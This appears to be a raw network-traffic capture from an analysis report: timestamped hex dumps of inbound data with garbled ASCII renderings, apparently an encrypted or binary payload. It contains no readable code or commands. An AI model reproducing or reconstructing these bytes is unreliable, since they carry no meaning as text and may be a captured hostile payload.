                                                                                                                  2023-08-29 17:16:42 UTC1620INData Raw: 35 5d 20 f4 7c 61 20 52 69 29 68 e4 7c 71 20 ec a5 38 19 8c 7c 25 20 a0 7c c9 20 d8 c1 70 91 f2 37 dd 20 48 7c eb 85 70 37 f5 20 10 23 3b ed 70 37 49 e5 e9 45 73 11 ea 65 73 39 e0 7f 7d 23 e8 e7 3a 5d ea 4d 05 23 b4 e5 3a 61 ea 39 73 9b 50 25 3d 95 ea e1 73 b1 30 36 49 c9 ea 91 73 c1 ea 99 73 93 34 a3 3a 05 70 37 0d 22 98 a7 3b 9b bc 27 3b b9 eb f5 72 ad 32 34 49 c1 eb 99 72 f9 eb a1 72 9b 38 27 3b 15 ec 61 75 2d 32 96 e7 5d f0 96 a8 68 f1 34 dd b9 a0 d9 6b ca b2 ed e9 68 18 79 91 b9 a1 ac 39 1d c0 78 45 24 f4 65 9a 21 ed 0d 4d 24 9c 67 38 41 ed 19 74 79 db b5 38 ba 04 95 a9 cd 08 78 95 24 58 a5 74 fd 72 37 bd 24 dc 27 3b 79 e0 7b 7d 27 94 67 9f b8 a2 19 09 27 a4 7b 31 27 40 65 3b bd 91 25 3b a9 ee 8d 77 d5 30 34 bd 1c 30 90 49 b9 a1 6d 76 35 ef 79 4d 26
                                                                                                                  Data Ascii: 5] |a Ri)h|q 8|% | p7 H|p7 #;p7IEses9}#:]M#:a9sP%=s06Iss4:p7";';r24Irr8';au-2]h4khy9xE$e!M$g8Aty8x$Xtr7$';y{}'g'{1'@e;%;w040Imv5yM&
                                                                                                                  2023-08-29 17:16:42 UTC1624INData Raw: b3 70 30 ea 22 73 27 ec 4c 74 1e ef 56 76 19 d0 45 09 1d d0 29 49 19 d0 97 79 d6 e1 69 7b 6f e2 d6 7b b9 e5 4c 7f de e6 52 7e 26 e7 3d 7e 8f e7 ef 7e c1 e7 45 71 03 e8 60 71 27 e8 17 71 42 e8 3c 71 9d e8 d7 71 b4 e8 fa 71 d2 e8 f8 70 00 ea 06 73 bd ea 4c 72 3e eb 80 72 2c ec c6 75 bc ec 51 74 43 ed e5 74 27 ee 12 77 76 ee b6 77 0f ef 5a 76 61 ef dc 76 ad ef f8 76 19 d0 45 19 1d d0 85 49 19 d0 5f 79 8b e0 de 79 b5 e0 9a 79 f0 e0 b4 79 e6 e0 49 78 30 e1 71 78 52 e1 15 78 75 e1 37 78 9f e1 c9 78 ba e1 f3 78 d4 e1 4f 7b 0a e2 5b 7b 2f e2 12 7b eb e2 1c 7a 75 e3 36 7a 99 e3 d3 7a a3 e3 8e 7a c6 e3 49 7d 33 e4 72 7d 75 e4 3e 7d af e4 97 7d ee e4 4e 7c 23 e5 0c 7c a1 e6 2e 7e bc e7 8d 7e 1f e8 c5 71 3d e9 02 70 43 e9 21 70 76 e9 c6 70 c1 e9 43 73 02 ea 09 73 69
                                                                                                                  Data Ascii: p0"s'LtVvE)Iyi{o{LR~&=~~Eq`q'qB<qqqpsLr>r,uQtCt'wvwZvavvEI_yyyyIx0qxRxu7xxxO{[{/{zu6zzzI}3r}u>}}N|#|.~~q=pC!pvpCssi
                                                                                                                  2023-08-29 17:16:42 UTC1628INData Raw: d8 7f af e6 fb 7f df e6 8b 7f cf e6 63 7e 74 e8 e1 71 cb e8 02 70 c7 e9 4d 73 29 ea 11 73 dd ea a6 73 f6 ea b1 73 e7 ea 67 72 98 eb e5 72 e3 eb 5c 75 2c ec a9 75 16 ed 5f 74 3e ed 14 74 44 ed 35 74 94 ed dc 74 b7 ed 84 74 f1 ed 62 77 2b ee 00 77 46 ee 29 77 66 ee d1 77 b8 ee f1 77 d0 ee 99 77 05 ef 79 76 b1 ef a2 76 19 b0 43 49 6d d2 45 49 06 e0 17 79 d2 e0 4f 78 58 e1 31 78 81 e1 8a 78 1b e2 7a 7b 9a e2 d5 7b b2 e2 95 7b fa e2 5f 7a 37 e3 7f 7a 54 e3 c9 7a ba e3 fd 7a d8 e3 8f 7a c3 e3 ac 7a 1d e4 07 7d 7b e4 2c 7d 77 e4 30 7d 63 e4 c4 7d 9f e4 c8 7d 8b e4 dc 7d 87 e4 e0 7d b3 e4 f4 7d af e4 f8 7d db e4 88 7d c2 e4 a5 7d f3 e4 aa 7d e3 e4 67 7c 37 e5 7d 7c 27 e5 07 7c 5f e5 0f 7c 57 e5 17 7c 4f e5 1f 7c 47 e5 27 7c 7f e5 2f 7c 77 e5 37 7c 6f e5 3f 7c 67
                                                                                                                  Data Ascii: c~tqpMs)sssgrr\u,u_t>tD5tttbw+wF)wfwwwyvvCImEIyOxX1xxz{{{_z7zTzzzz}{,}w0}c}}}}}}}}}g|7}|'|_|W|O|G'|/|w7|o?|g
                                                                                                                  2023-08-29 17:16:42 UTC1632INData Raw: 8a 7a 09 e4 71 7d 9a e4 f3 7d c0 e4 49 7c 48 e5 3d 7c d6 e5 47 7f 31 e6 cf 7f a4 e6 a1 7f 5f e7 3c 7e 86 e7 ac 7e 30 e8 15 71 dc e8 b3 71 01 e9 ec 70 c7 e9 4f 73 2a ea 19 73 be ea 9c 73 19 eb 2b 72 bb eb 8c 72 2e ec 2e 75 97 ec f2 75 ec ec 59 74 9d ed fa 74 f2 ed 50 77 21 ee c9 77 a6 ee a6 77 2b ef 20 76 90 ef fb 76 19 d0 45 f9 1e d0 dd 49 19 d0 47 79 30 e0 cf 79 a4 e0 a5 79 17 e1 15 78 6f e1 f6 78 18 e2 6d 7b d1 e2 b9 7b 06 e3 10 7a ba e3 8c 7a 3b e4 28 7d 8c e4 46 7c 22 e5 26 7c 00 e6 0b 7f 68 e6 eb 7f f8 e6 40 7e 23 e7 3c 7e 85 e7 8f 7e 1c e8 69 71 68 e8 f3 71 c3 e8 51 70 44 e9 c4 70 ac e9 5c 73 78 ea ec 73 ca ea b2 73 37 eb 36 72 db eb be 72 30 ec 17 75 6c ec f8 75 f9 ec b0 75 23 ed 18 74 84 ed ef 74 cd ed 53 77 28 ee 09 77 88 ee 80 77 cb ee bd 77 6a
                                                                                                                  Data Ascii: zq}}I|H=|G1_<~~0qqpOs*ss+rr..uuYttPw!ww+ vvEIGy0yyxoxm{{zz;(}F|"&|h@~#<~~iqhqQpDp\sxss76rr0uluu#ttSw(wwwj
                                                                                                                  2023-08-29 17:16:42 UTC1636INData Raw: 45 49 19 90 4c 49 dd d0 45 49 10 e0 51 79 36 e0 7f 79 8f e0 e5 79 d2 e0 1a 78 ce e1 98 78 25 e2 25 7b 8b e2 c5 7a a1 e3 a1 7a ef e3 5f 7d a1 e4 a6 7d ea e4 57 7c 01 e5 5b 7c f7 e6 41 7e 44 e7 26 7e 70 e7 97 7e aa e8 fc 71 90 e9 d2 70 be e9 2e 73 c5 ea 48 72 03 eb 7b 72 40 eb 20 72 74 eb dd 72 b3 eb fb 72 d2 eb 97 72 c2 eb a5 72 29 ec 79 75 5d ec 2b 75 62 ec e1 75 ac ec f9 75 dd ec 96 75 c4 ec a2 75 f4 ec be 75 19 ed 4d 74 17 ed 50 74 02 ed 66 74 24 ed 0c 74 44 ed 29 74 6a ed d9 74 b7 ed f8 74 dd ed 94 74 ff ed bc 74 e6 ed 56 77 3d ee 6f 77 55 ee 1d 77 7d ee 35 77 76 ef d8 76 d4 ef 45 49 19 80 4c 49 a5 d0 45 49 1e e0 78 79 63 e0 f2 79 ee e0 67 78 53 e1 3f 78 bb e1 97 78 1b e2 6f 7b 4b e2 3f 7b bb e2 90 7b 14 e3 70 7a 44 e3 d8 7a dc e3 bf 7a 3b e4 0f 7d 6b
                                                                                                                  Data Ascii: EILIEIQy6yyxx%%{zz_}}W|[|A~D&~p~qp.sHr{r@ rtrrrr)yu]+ubuuuuuMtPtft$tD)tjttttVw=owUw}5wvvEILIEIxycygxS?xxo{K?{{pzDzz;}k
                                                                                                                  2023-08-29 17:16:42 UTC1640INData Raw: d5 42 19 50 25 45 3b bc e5 e7 91 e0 c9 69 b7 d8 74 c9 0d e1 65 78 ed e1 b9 a9 68 7a a1 69 34 d0 a5 05 dd e0 7d 1d c9 f1 2f d1 c9 9f a1 19 16 24 b5 69 28 80 89 09 2f 44 72 15 21 f4 d5 02 79 c5 55 2e d9 a0 59 6d 69 d7 d9 72 a1 dd b5 0e 35 a0 5d 38 7a 60 79 cd 24 d2 c9 d9 7b a4 7b 35 27 40 7b 4c e8 8f c5 59 5d 48 7a 89 26 18 04 59 79 d0 e5 42 19 44 b5 4e 95 d5 35 0b 8d e0 1a fd 29 10 75 3d 1d e1 79 59 64 1c 76 dd 2d 8c 00 b9 31 70 57 4e 09 e6 25 f9 4f cc 50 d9 3f b0 55 6c b5 e0 60 99 2e c8 54 39 3d f8 7d 71 c9 bf b5 71 11 c0 7c 61 20 a0 35 26 2d ea 15 d9 23 a0 7f fd e9 c5 bd 73 88 81 c7 21 4b 81 c9 72 89 eb dd f9 48 50 91 72 9d ec cd 75 95 60 29 6b 6d e0 79 35 24 48 35 40 b1 ed 67 f1 29 80 89 74 cd 80 15 dd 27 92 19 f8 3f 60 4e 49 69 b0 45 6d 19 e0 a9 79 ad
                                                                                                                  Data Ascii: BP%E;itexhzi4}/$i(/Dr!yU.Ymir5]8z`y${{5'@{LY]Hz&YyBDN5)u=yYdv-1pWN%OP?Ul`.T9=}qq|a 5&-#s!KrHPru`)kmy5$H5@g)t'?`NIiEmy
                                                                                                                  2023-08-29 17:16:42 UTC1644INData Raw: 4d c2 19 92 51 19 73 2f ce 04 11 d0 ce 18 4d 2f 97 c0 5c 38 4d 8e 5c 20 97 43 10 5b 00 b9 59 53 85 48 90 95 b5 88 18 85 45 b9 22 81 5d 3a 12 5b 00 69 f9 d3 00 b9 df 30 44 a8 94 b4 08 99 e9 d3 a9 1b b6 d4 e3 4d 73 50 57 23 19 5b 00 a1 49 f2 44 59 1d 82 ad 83 f9 8b c6 8d 09 c8 82 0c ed c1 43 cb 1a e0 cc 04 b3 0c 60 40 c5 53 47 61 3a d5 4d 6a 1c 90 11 b6 c9 17 00 91 e8 d2 2d 45 09 f7 05 4a 08 d2 25 1b f1 5f c4 e9 04 53 81 41 94 95 9d 0a 1a 7a 75 0a 1a cc 06 4a 31 93 44 41 5a d1 45 71 e6 01 cc 0c ed ba 5b 40 d9 d8 10 bd 3a d1 41 18 f1 ed 10 8c 11 34 26 58 fd 43 44 45 0a d4 0d dd e6 00 74 4a 38 e0 46 04 ed f3 44 79 1d 80 ad 40 2a d3 85 4c 99 a9 45 48 19 a4 43 8f 5c 2f 44 4d f2 d4 15 49 19 df f3 1c e6 b1 46 4d 35 81 ce 19 3d dc f1 4d 41 c1 94 41 48 38 59 6b 12
                                                                                                                  Data Ascii: MQs/M/\8M\ C[YSHE"]:[i0DMsPW#[IDYC`@SGa:Mj-EJ%_SAzuJ1DAZEq[@:A4&XCDEtJ8FDy@*LEHC\/DMIFM5=MAAH8Yk
                                                                                                                  2023-08-29 17:16:42 UTC1648INData Raw: 03 1a 1e 5b 65 07 9a f0 ae 4d 9a 3f 41 29 09 f0 ce 4d 02 59 35 4b 92 ef ce 9a 32 b0 92 00 9a 2a 4f 48 49 c0 44 65 48 60 44 7d 64 c8 65 41 79 61 42 1e 29 80 10 a1 6e 60 16 79 00 39 12 48 69 d0 ce 8f 2a 02 84 a9 1e d0 6e 8f 94 d4 05 c4 15 50 65 c4 5d 5e 44 f0 69 d2 45 6c 5d 2f 3a 4b 4f f8 b2 b8 69 f3 51 51 92 84 f8 18 15 f1 41 c2 15 40 44 e9 1c cc ae 6b 9a 2a 44 3c 19 db c8 5d 22 01 bf c2 5d 50 d0 49 f2 d4 ce 0d 84 f1 4b e0 2b d2 51 c8 d9 84 59 a9 1e c0 67 57 48 c0 5c c4 6d 55 b5 01 a4 61 66 c6 13 11 b4 6c 09 65 47 25 3d cc ce 49 15 41 6e 84 6c cf ce 47 3c 40 54 15 29 d1 cc 41 a9 dd 55 c0 59 c6 04 ca df d4 02 99 1f c0 c4 19 52 3b 80 cc d0 af 48 4d 1b ca 02 48 18 64 81 49 28 8b c8 3d 8c b5 a5 4c 84 30 40 36 7f 7f 40 e4 1c c8 c5 c0 0f 99 c6 a7 1d 9b e5 4c 19
                                                                                                                  Data Ascii: [eM?A)MY5K2*OHIDeH`D}deAyaB)n`y9Hi*nPe]^DiEl]/:KOiQQA@Dk*D<]"]PIK+QYgWH\mUafleG%=IAnlG<@T)AUYR;HMHdI(=L0@6@L
                                                                                                                  2023-08-29 17:16:42 UTC1652INData Raw: 41 1f 59 55 8c 1e 6c da 1a 4b 0e 8e 45 8b 11 d0 ce 38 39 55 b3 68 13 d2 7b 72 e0 a4 ac 48 5f d4 05 01 9a 28 46 3e 27 70 56 59 19 2f 61 cc 25 fd 05 49 9c d0 97 3d 2f 53 bf 48 6c df c5 c2 58 d4 82 0f 1d d3 65 44 19 59 03 45 f2 c2 c6 b3 1b e4 30 8c 7a d2 41 2a 1b 74 42 3f df 58 1a 7a d9 71 4c 18 f1 c7 c4 11 19 14 41 bf c1 cb 85 16 9a 10 a5 4a 47 53 85 b7 f9 d2 e5 40 39 a4 4d 16 9a 18 06 47 4f dc 65 c2 5e d4 7e 99 3e d2 14 a1 0b 30 44 0f 5f dc 65 4e 9c 10 32 59 31 86 ad f9 db ea 41 cd d9 d0 31 52 92 96 15 c2 57 9c f5 72 d8 ac 54 a9 17 d1 0c 16 1b e1 f8 a8 1f 8f 47 02 38 d1 05 5a 02 dc 3a 4c 13 02 30 8e 1d 96 49 ca 14 93 d1 44 d8 dc 79 16 a1 91 58 ca 14 d1 64 68 18 5d 0c 09 19 28 69 09 19 c9 25 49 72 9d 25 49 d5 b0 45 ac 2a 51 3d ab 2a a3 45 43 92 98 7d cc d0
                                                                                                                  Data Ascii: AYUlKE89Uh{rH_(F>'pVY/a%I=/SHlXeDYE0zA*tB?XzqLAJGS@9MGOe^~>0D_eN2Y1A1RWrTG8Z:L0IDyXdh](i%Ir%IE*Q=*EC}
                                                                                                                  2023-08-29 17:16:42 UTC1656INData Raw: 76 80 92 05 83 0d 19 dc 71 49 2a 10 c5 75 09 d8 45 3d 1c d1 46 48 59 53 bd 09 09 ac aa 08 9a 12 05 15 09 d0 39 96 2a 2f cf 0d 25 e4 45 cd d9 a4 41 23 18 3b 47 49 73 d0 2f 48 4f 38 b1 a0 18 d0 3e 8d 15 97 c6 b6 09 ac 4d a8 2a 10 04 73 93 9c 41 7d 19 54 8c 3d 3a e3 ba c9 25 84 6a 49 10 db 82 41 12 33 85 6f 79 e0 05 ca dc c0 85 51 58 dd 39 81 19 5b 39 6d 09 87 2f 4a 4f dc ad e9 99 d9 c5 22 31 85 2f 46 31 86 ad da db dc 5d c9 71 9f fd dd 37 63 45 62 a7 51 18 62 df 92 5f 49 1e e3 a8 cd d9 a6 53 23 53 d1 04 5e 70 90 4f 7a d9 10 52 c3 59 d7 00 72 f1 ac af 8a 05 83 14 48 0a 9c 61 25 99 cb 6d 88 07 d3 4f 86 99 86 83 88 03 55 ba 46 97 96 e0 08 72 13 2c 35 3d f8 84 5d 2a d0 97 c3 09 5b bf 1e 73 d5 cd 1f f1 c8 04 4e 5d f4 65 89 1f c5 c5 7c 78 90 57 29 98 f6 76 80 93
                                                                                                                  Data Ascii: vqI*uE=FHYS9*/%EA#;GIs/HO8>M*sA}T=:%jIA3oyQX9[9m/JO"1/F1]q7cEbQb_IS#S^pOzRYrHa%mOUFr,5=]*[sN]e|xW)v
                                                                                                                  2023-08-29 17:16:42 UTC1660INData Raw: 67 cb 19 ea 4d 46 9d c9 c7 49 3b df c1 59 38 52 45 63 16 54 42 cb 19 fb 4a 7f 9d 80 e6 c9 19 fc 95 00 9b d0 7e 46 9d 54 a9 cb 19 ec 4a cd fa 52 45 59 24 df c1 93 9b d0 7b 46 9d 92 94 cb 19 ef 4a cd d1 52 45 12 11 df c1 f6 9b d0 18 46 9d 66 64 cb 19 ac 4a cd b4 52 45 66 6c 56 62 db 12 03 4f 19 4e 38 5e b8 13 d6 48 88 19 41 2b b1 2a 0b 83 48 11 ff ac c8 ab d2 6b 3c 2e 55 45 92 6d a8 c6 b2 10 ad 62 4d 92 c5 12 4a 4b 87 ad ac c8 41 57 58 1a 28 e4 48 18 6b 4c b9 1b 50 83 49 37 3b 09 f2 15 40 45 49 f2 95 c6 b2 15 ad 05 ca 59 2b 4d 3d 22 5b 48 38 1a 81 5d 1c f1 63 55 4a 5a d4 46 91 4b ca 12 8d 0b 4e 04 48 dd d7 55 4a e1 43 45 03 88 11 c3 c9 19 d1 cd 48 3d d7 67 64 3b d7 10 a1 6b 66 47 4a f1 f3 b5 90 99 c5 44 c2 e9 b0 50 cc b0 df b4 a5 09 6a 45 64 61 41 16 c2 45
                                                                                                                  Data Ascii: gMFI;Y8REcTBJ~FTJREY${FJREFfdJREflVbON8^HA+*Hk<.UEmbMJKAWX(HkLPI7;@EIY+M="[H8]cUJZFKNHUJCEH=gd;kfGJDPjEdaAE
                                                                                                                  2023-08-29 17:16:42 UTC1664INData Raw: c5 6d 59 eb 84 46 9c aa c7 4f 73 70 06 4d 5d 51 43 21 58 d4 41 2d 0d c4 ce 5c bb 5e 4d a9 7a 82 ad 21 5c b2 c9 41 7d 5c 55 72 e9 f1 18 69 1a b0 74 a9 31 eb b6 3d 10 86 ad 2b 0a 53 44 1a f1 da 64 7d 79 56 15 7d f1 d0 07 4b 11 97 cc ab 5d eb 86 09 6c dc 12 a1 7b 55 a7 c4 90 94 00 5d 98 8a cc 0c 15 f3 1b 69 91 5b 50 a9 39 51 cc 63 b8 12 45 49 5c e0 c8 0c 2d 59 5d c2 ab dd c4 0b 58 73 24 4b 7b 8c cc 4b 1b d1 a4 62 22 18 30 40 92 85 45 2e 3a 8d 24 03 1e a1 c4 fc 3b c2 c5 46 2a b2 85 8b 16 85 ad 27 5a d2 22 4d 44 c1 46 4b 4a 38 11 49 18 86 ad 07 ba 70 45 88 37 80 ad 0d 1b d3 49 c9 1e c3 67 3e fb d7 d5 d9 39 de 41 c8 e0 d0 f9 4e 19 d0 38 4f a1 d0 6d 49 38 d0 e4 ea 11 70 31 45 d8 80 a5 4c 12 12 45 48 09 d5 44 5d 19 11 a5 4f 12 12 c6 88 5d 91 45 4b d8 31 5c 42 d8
                                                                                                                  Data Ascii: mYFOspM]QC!XA-\^Mz!\A}\Urit1=+SDd}yV}K]l{U]i[P9QcEI\-Y]Xs$K{Kb"0@E.:$;F*'Z"MDFKJ8IpE7Ig>9AN8OmI8p1ELEHD]O]EK1\B
                                                                                                                  2023-08-29 17:16:42 UTC1668INData Raw: 6f d4 89 d4 ad 18 3c 3d 72 53 14 41 72 7d 03 e1 46 34 98 2d 2f 24 8c f4 0c c2 f1 09 3d 50 75 51 0e 29 98 10 5f 09 98 31 d9 4d 48 38 fe d5 9c a8 95 9c 9e d7 19 dd 89 24 c5 ad 1b 27 c5 b4 e7 50 55 66 ea 50 44 41 e6 50 03 31 09 09 4f cc c2 54 38 47 11 a8 b8 ba bc 71 94 84 cc 50 30 5a 1a 89 b1 1b 61 d3 05 11 48 d8 cd 05 3d c4 26 54 48 b8 a5 6b 3d 04 af eb 8c 8b fd cb 1b 0a b5 49 9a ca e8 0a 3f 81 05 f7 9f b9 3d 6b 1a 67 45 48 b1 53 81 61 4a d3 11 1b 1a 74 13 4a 01 81 ad 9b f9 c7 b0 17 31 b8 45 78 c9 ca 17 a1 47 20 81 da 73 c8 76 eb d9 40 2f 52 93 1a d0 17 00 43 1b 30 b9 ba 41 51 28 d2 74 1a 9e 4e 75 1a 67 05 74 1a e3 c3 16 50 0d 83 5d c8 51 88 47 4c 0d 83 5d 56 4a 94 71 50 19 71 e4 e8 0e 80 ad 85 82 c5 16 39 03 83 79 51 92 40 ab 49 0c b7 dd 2b 3d 3b df ae d1
                                                                                                                  Data Ascii: o<=rSAr}F4-/$=PuQ)_1MH8$'PUfPDAP1OT8GqP0ZaH=&THk=I?=kgEHSaJtJ1ExG sv@/RC0AQ(tNugtP]QGL]VJqPq9yQ@I+=;
                                                                                                                  2023-08-29 17:16:42 UTC1672INData Raw: 47 53 39 f9 53 f1 e7 2f ba b6 b9 53 8e b6 de d7 a5 49 e6 f1 40 50 9b d7 52 8e 19 b2 c4 43 9a 2a ba 49 6d de c8 5d 4b 5b 51 9c 09 e0 c1 0a 19 52 13 bf 16 55 47 3f 59 56 ce 5c fd b4 06 49 09 55 97 3d 67 11 e7 5d 9a 28 45 b7 6d df c6 b1 e4 a4 4f 49 9a 28 b9 3d 1c 53 bd b3 19 a5 3e ca e2 2f 3b 20 9a 70 79 d0 19 a4 26 28 1d d9 84 4a b9 d4 76 9b f2 d5 e6 cf c4 10 4c 49 3d ad 70 c2 e4 d3 90 62 19 2b ce 7d 80 eb 9f c2 da d0 38 5d 92 8c c4 4d 90 cc 47 c8 f9 f6 55 09 22 12 39 b9 08 10 19 55 90 e4 a7 48 56 a5 9c ca b8 fc c5 69 3d 5d 19 5a 18 91 50 0b f2 50 4f b2 16 54 d7 28 0c 28 f5 b3 16 54 cc ec 05 90 48 4e 39 c1 65 3c 73 3b 4c 0c b9 c9 51 b5 58 30 5e c2 5d 79 41 0c 39 ec 6d 68 18 c3 66 23 18 83 45 f5 01 b8 27 c1 99 99 15 a1 f4 d0 41 29 15 f0 e5 ca dd c0 00 0a 19
                                                                                                                  Data Ascii: GS9S/SI@PRC*Im]K[QRUG?YV\IU=g](EmOI(=S>/; py&(JvLI=pb+}8]MGU"9UHVi=]ZPPOT((THN9e<s;LQX0^]yA9mhf#E'A)
                                                                                                                  2023-08-29 17:16:42 UTC1676INData Raw: 77 5d 73 d0 e4 19 71 d0 47 23 1a 70 4f 4e b9 d0 25 4b 98 87 82 0c 8b 79 15 47 e9 11 15 dc 6d a9 ce 54 1d 00 47 59 32 94 5d 19 68 cd 2f 45 4f c0 74 65 08 f3 47 b6 0c 90 97 53 63 a5 03 fc 78 4b 14 88 17 ec 55 48 79 cc 7d 78 16 86 bd 79 62 21 3e 51 5a cc 12 89 1a 2f 0f 9a 49 cf 4d b9 4c dc 44 39 9b 87 98 51 1a e4 b6 47 e8 df 84 5c da 02 43 cc 10 d0 45 48 4e 2f 96 ca e1 2f 99 3d 16 40 47 68 1b c1 41 4d 09 d4 e7 4b 8c 24 52 18 bf eb 9e e9 22 13 12 a9 ab 09 55 f3 f1 b5 85 04 79 eb 43 8a d5 01 12 68 cd e9 cf 0d 21 2f a4 e8 25 ff 45 3d 1d ec 19 3c 11 5b 07 49 01 dc 55 c0 5b c8 7c 13 19 d8 31 61 20 8a 55 3d 0e 50 ce 0b 0d 78 44 3d 1c a2 0a 29 b1 d4 31 5a a2 51 45 e9 be e5 67 f9 99 d6 ce 54 ad 80 45 cc ef c2 fc 39 0a d0 f8 99 4b d0 30 4d 5c 40 d4 43 e8 d0 44 f4 16
                                                                                                                  Data Ascii: w]sqG#pON%KyGmTGY2]h/EOteGScxKUHy}xyb!>QZ/IMLD9QG\CEHN//=@GhAMK$R"UyCh!/%E=<[IU[|1a U=PxD=)1ZQEgTE9K0M\@CD
                                                                                                                  2023-08-29 17:16:42 UTC1680INData Raw: 4a cd a9 d0 45 72 9a ee 50 24 3e 54 07 cb ae 52 7e 7a d0 58 cd 55 1b d8 87 09 93 1f 43 f6 2a d3 33 c8 3e 90 0c 4b 13 de a9 9e 56 d3 cd 23 9d 3c 86 bf c9 58 41 58 1d 5b 70 8e 0d 5b 86 be c9 e3 65 80 5f 5a 89 c0 1b d5 cd 45 c3 e2 cd 75 b8 91 79 48 36 42 44 66 51 9c 07 32 d9 c6 e4 d5 6c 94 44 51 9c d0 85 3d 43 55 9e 46 9f 64 24 89 11 85 ce 25 3d 90 70 4b 40 09 05 3a 1b 5b 8e c2 24 91 48 c0 18 52 79 c2 c8 5b b0 88 f0 d2 55 ba bc 5b 8f cb 08 53 a4 4a 9d 23 e1 0b 02 d3 ad 62 c1 52 52 41 49 38 64 0a 34 55 9e 3e a1 70 18 16 47 8b 86 c9 94 c0 46 01 fd 59 58 c8 18 38 45 4a 11 11 43 41 58 d0 c8 5d 01 eb 94 3f 08 b8 45 c1 60 93 45 a1 54 80 45 44 99 d8 41 cb 16 d3 7c 3d 3d c0 ce 09 d2 5d 79 4b 92 11 46 69 d1 ad 87 57 18 92 51 c8 10 d1 ec 41 19 51 74 41 19 86 12 c2 65
                                                                                                                  Data Ascii: JErP$>TR~zXUC*3>KV#<XAX[p[e_ZEuyH6BDfQ2lDQ=CUFd$%=pK@:[$HRy[U[SJ#bRRAI8d4U>pGFYX8EJCAX]?E`ETEDA|==]yKFiWQAQtAe
                                                                                                                  2023-08-29 17:16:42 UTC1684INData Raw: 95 2d 79 d0 51 3e 11 51 ba 49 19 f8 45 49 6b f5 fc 43 58 81 50 8e 92 06 ad 7f e9 c2 ce 49 eb 95 c0 bf 92 28 32 a0 8b a2 41 4b 6a 0f a4 4b a1 f0 45 49 19 16 01 6d 05 e0 23 c0 5d 80 61 54 9c 26 d5 1a 06 e1 41 a1 18 80 63 3b 49 ba 45 23 13 86 81 1e a4 60 45 49 f1 90 f5 43 2b d5 e1 a1 ff 50 16 c2 e9 f2 1c b3 08 d2 cd 09 4e 86 85 4a 3d 38 9b 39 71 71 b4 49 1d e0 12 1f 69 d4 69 39 1c 40 68 67 f1 98 95 4b 1d e0 b5 49 19 ce ae 76 92 1f 76 a4 12 e8 8b 3d 2b a3 40 cb 68 73 45 c2 c1 d4 ad 69 48 d5 bd c9 da e0 ce 49 eb 58 19 65 05 5b 92 0c 09 db 93 3c cf 00 4b 6d 9c 3d c1 3c 1c 22 23 cc f4 ae 51 39 33 d2 59 b8 17 98 cf 45 31 58 4e 89 5a 9d c0 a4 66 25 e4 41 79 cd 45 7c 9a 28 44 3c 1c 16 46 09 52 3b 64 ca e1 d2 d4 49 54 dc ae 5e b9 fb d4 49 5e 3b 48 ca 1d 28 41 d8 19
                                                                                                                  Data Ascii: -yQ>QIEIkCXPI(2AKjKEIm#]aT&Ac;IE#`EIC+PNJ=89qqIii9@hgKIvv=+@hsEiHIXe[<Km=<"#Q93YE1XNZf%AyE|(D<FR;dIT^I^;H(A
                                                                                                                  2023-08-29 17:16:42 UTC1688INData Raw: ad fb 1a 70 49 c8 15 d6 ff 49 d9 df c1 e9 19 d0 45 21 19 bc 39 0a 19 86 ad d5 5e 90 44 49 9a 14 4d cc 19 78 cf 48 19 78 ce 0d 3d fc 2f 49 4f d0 15 a1 79 09 ba b6 9a 14 45 45 9c 10 31 3f 92 9c 61 49 31 86 c8 35 54 d0 12 a1 19 69 73 48 19 5b 19 6d 39 51 44 2b c2 a4 6c 1c f1 1d 45 69 19 5d 31 0c 19 83 23 8e 1f d0 6a 49 9a 16 47 1f f1 45 04 49 3d 86 10 a1 e6 2d 44 c9 0d d0 cc 0d 3d c0 ae 5e 92 84 45 6d 0d 5b 07 41 49 ba 45 e9 4c 38 f3 45 19 d0 34 45 18 c8 45 cc d9 b6 82 4e 19 d0 30 09 13 17 01 6d 39 d1 45 37 f2 d0 40 ca e1 2f 30 7c 92 ac 65 6d 0d 87 ad 84 19 c1 ce b9 19 53 81 4d 9c 26 4a cc 2e f0 ba b6 e6 3b 65 49 6d d8 23 48 19 5f 59 2f 90 db ce 8e ee 50 9d 52 d9 53 a5 4c 51 d2 26 4b 11 d1 71 c2 6d f4 5d cc e6 b0 31 40 4e 38 35 49 25 d2 7f 3d 19 d6 23 8e 5f
                                                                                                                  Data Ascii: pIIE!9^DIMxHx=/IOyEE1?aI15TisH[m9QD+lEi]1#jIGEI=-D=^Em[AIEL8E4EEN0m9E7@/0|emSM&J.;eIm#H_Y/PRSLQ&Kqm]1@N85I%=#_
                                                                                                                  2023-08-29 17:16:42 UTC1692INData Raw: 75 a2 1f 53 c1 81 e6 d0 59 c0 1b 59 0f 28 4a 7d 04 6e 0d d0 46 ab 21 59 c4 8e 25 f0 62 78 b9 f8 16 a1 08 10 49 89 16 ec 17 f1 f1 f5 1b eb 16 15 48 a0 5c e0 27 76 99 ac 61 0d 4e 38 56 56 99 dd c7 d5 d8 aa ce 91 f1 46 6a 38 3e d1 a7 55 ee 0e 5e bf 49 96 ad 5d 59 32 04 4d 09 20 43 2b 49 87 19 a1 6f 20 44 4b 14 82 5b 01 4b ce 48 96 4b ce 54 61 48 cf 1b 57 b8 cf 5f 8c 04 00 47 5c fa ce 41 5d 18 c0 1d 57 29 13 c8 2d 5d cb 85 66 84 c1 c2 1f 9f ce 3d 4b 1c 82 52 1e 4c 38 78 57 18 90 45 23 36 85 ad 64 e9 88 c8 41 55 8d bb 99 10 eb 84 3c 1e 50 23 8e 5d 8d bb 49 19 80 5d db 56 30 4a 59 4b 13 59 2f e7 92 52 59 49 38 dc 71 df cc 10 a1 f4 c3 55 4f da cc 74 43 da cc 01 6d 2d a0 15 a1 7e c2 86 55 d9 f4 85 cc 21 d3 e5 4d da cc 09 6d 09 81 10 a1 dd 16 9c 8f 05 85 ad e2 09
                                                                                                                  Data Ascii: uSYY(J}nF!Y%bxIH\'vaN8VVFj8>U^I]Y2M C+Io DK[KHKTaHW_G\A]W)-]f=KRL8xWE#6dAU<P#]I]V0JYKY/RYI8qUOtCm-~U!Mm
